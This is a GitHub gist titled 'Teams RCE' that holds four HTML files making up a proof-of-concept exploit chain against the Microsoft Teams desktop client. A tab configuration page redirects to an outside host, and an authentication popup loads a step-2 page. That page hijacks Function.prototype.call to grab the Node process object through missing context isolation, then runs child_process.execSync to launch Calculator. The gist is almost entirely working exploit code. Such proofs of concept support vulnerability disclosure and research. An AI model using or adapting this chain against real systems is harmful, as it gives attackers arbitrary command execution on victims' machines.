-
-
Save matt-/1a6f29a8b233e2cd7c5228ca523e5bf1 to your computer and use it in GitHub Desktop.
Teams RCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<style> | |
body{ | |
background-color:#F0F2F4;color:#16233A;font-family:'Segoe UI', Tahoma, Helvetica, Sans-Serif;font-size:0.875rem;font-weight:400;line-height:1.25rem} | |
} | |
</style> | |
<script src="https://statics.teams.microsoft.com/sdk/v1.0/js/MicrosoftTeams.min.js"></script> | |
<script> | |
(function() { | |
'use strict'; | |
// Call the initialize API first | |
microsoftTeams.initialize(); | |
// Trigger the remote login page | |
microsoftTeams.settings.registerOnSaveHandler(function(saveEvent) { | |
microsoftTeams.settings.setSettings({ | |
contentUrl: 'https://maustin.net/hax/teams/', | |
entityId: 'https://maustin.net/hax/teams/' | |
}); | |
saveEvent.notifySuccess(); | |
}); | |
// Logic to let the user configure what they want to see in the tab being loaded | |
document.addEventListener('DOMContentLoaded', function() { | |
microsoftTeams.settings.setValidityState(true); | |
}); | |
})(); | |
</script> | |
</head> | |
<body> | |
<h2>save</h2> | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<script> | |
// close the auth page | |
window.close() | |
</script> | |
</head> | |
<body>done</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<style> | |
body{ | |
background-color:#F0F2F4;color:#16233A;font-family:'Segoe UI', Tahoma, Helvetica, Sans-Serif;font-size:0.875rem;font-weight:400;line-height:1.25rem} | |
} | |
</style> | |
<script src="https://statics.teams.microsoft.com/sdk/v1.0/js/MicrosoftTeams.min.js"></script> | |
<script> | |
(function() { | |
'use strict'; | |
microsoftTeams.initialize(); | |
// get a new context and trigger the auth workflow | |
microsoftTeams.getContext(function(context){ | |
microsoftTeams.authentication.authenticate({ | |
url: 'step2.html', | |
width: 550, | |
height: 660, | |
successCallback: function() {}, | |
failureCallback: function() {} | |
}); | |
}); | |
})(); | |
</script> | |
</head> | |
<body> | |
Microsoft Teams POC | |
</body> | |
</html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<script> | |
// without context isolation the Function prototype is shared with with nodejs internals. | |
// this means we can overload and a hook a function call that gets the node "process" object. | |
Function.prototype.call= new Proxy(Function.prototype.call, { | |
apply: function(target, thisArg, argumentsList) { | |
var ret = Reflect.apply(target, thisArg, argumentsList); | |
if(argumentsList[0].pid){ // this is probably a process ref | |
argumentsList[0].mainModule.require('child_process').execSync('open /Applications/Calculator.app'); | |
} | |
return ret | |
} | |
}); | |
location.href="done.html" | |
</script> | |
</head> | |
<body> | |
MSTeams POC Step #2 | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment